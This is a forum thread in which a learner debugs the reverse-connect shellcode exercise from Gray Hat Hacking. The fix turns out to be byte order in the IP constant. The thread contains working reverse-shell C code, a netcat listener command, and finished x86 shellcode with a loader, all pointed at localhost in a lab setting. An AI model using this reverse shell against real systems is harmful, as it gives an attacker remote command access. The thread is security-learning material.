Writing some shellcode, need a little help

[g3ksan]

Hey guys,

I'm working through Gray Hat Hacking and I'm trying to write the reverse connect shellcode example in the book.

The code originally had serv_addr.sin_addr.s_addr=0x650A0A0A; in it, which is 10.10.10.101. I figured it might be part of the environment in the book, so I changed it to 0x100000F7;, which is 127.0.0.1.

The book has me run a netcat session as "nc -nlvv -p 49059" and then run the program, which should just connect to the netcat session. nc just sits there, and the program just sits there. When I do a netstat to see what's going on, I get:

Code:

#
tcp        0      0 0.0.0.0:48059           0.0.0.0:*               LISTEN      15795/nc        
#
tcp        0      1 192.168.1.69:55624      247.0.0.16:48059        SYN_SENT    16187/reverse_conne

Which is an external IANA reserved IP. When I change the code to reflect the book, it goes out to the proper IP that I hardcoded, which is 10.10.10.101 and when I hardcode my wlan0's IP, it goes out to 12.138.16.84 which is owned by ATT. When I turn off the internet, the code just exits.

The book does not provide an environment to code in like Art of Exploitation does, so I'm trying it in BT4. I'm pretty much dumbfounded at this point, I'm not even sure how to troubleshoot this further. I understand if this is considered off topic.

Thanks in advance!

Source is below:

Code:

#include<sys/socket.h>
#include<netinet/in.h>

int main()
{
	char * shell[2];
	int soc,remote;
	struct sockaddr_in serv_addr;

	serv_addr.sin_family=2;
	serv_addr.sin_addr.s_addr=0x100000F7;
	serv_addr.sin_port=0xBBBB;
	soc=socket(2,1,0);
	remote = connect(soc, (struct sockaddr*)&serv_addr, 0x10);
	dup2(soc,0);
	dup2(soc,1);
	dup2(soc,2);
	shell[0]="/bin/sh";
	shell[1]=0;
	execve(shell[0],shell,0);
}

[Gitsnik]

Well it's been a while since my C code had to do this, but is s_addr in network byte order?

Presumably you're compiling your program and sending it out, so why not inet_aton("127.0.0.1"); instead of 0x100000F7 to see what happens (assuming I got the right function call etc. but you know what to do).

Beej's guide to network programming is golden for keeping this simple enough to read through. Then you can do your conversions and see how things go

[lupin]

It appears to be specifying the address in reverse hex format.

e.g. from the line of code as follows:

Code:

serv_addr.sin_addr.s_addr=0x100000F7;

We obtain the address:

Code:

0x100000F7;

Break this into 4 individual bytes

Code:

0x10, 0x00, 0x00, 0xF7

The decimal equivalent of which is:

Code:

16, 0, 0, 247

Reverse the order of the bytes to find the IP address:

Code:

247.0.0.16

So if you wanted to connect to an address of 192.168.0.1 (as an example), take the individual values:

Code:

192, 168, 0, 1

Reverse the order:

Code:

1, 0, 168, 192

Convert to hex format:

Code:

0x01, 0x00, 0xA8, 0xC0

Join together:

Code:

0x0100A8C0

And modify the line of code to read as follows:

Code:

serv_addr.sin_addr.s_addr=0x0100A8C0;

[g3ksan]

lupin! thank you very much!

I was using an online converter, thats what probably did me in. I need to memorize how to do that manually.

edit: lupin, seriously thank you so much. You have no idea how long I've been staring at this wondering why.

Code:

listening on [127.0.0.1] 48059 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56527
whoami
root

And the chapter is finished with a final conversion to opcode! Thank you again lupin, you really made my day

Also, if you've been thinking about it, writing shellcode and simple exploits are not that hard! Get cracking!

Code:

char sc[]=
        "\x31\xc0\x31\xdb\x31\xd2\x50\x6a\x01\x6a\x02\x89"
        "\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc6\x52\x68\x7f"
        "\x00\x00\x01\x66\x68\xbb\xbb\x31\xc9\xb1\x02\x66"
        "\x51\x89\xe1\x6a\x10\x51\x56\x89\xe1\xb3\x03\xb0"
        "\x66\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\xb0\x3f"
        "\xcd\x80\x41\xb0\x3f\xcd\x80\x52\x68\x2f\x2f\x73"
        "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1"
        "\xb0\x0b\xcd\x80";

main() {
        void (*fp) (void);
        fp = (void *)sc;
        fp();
}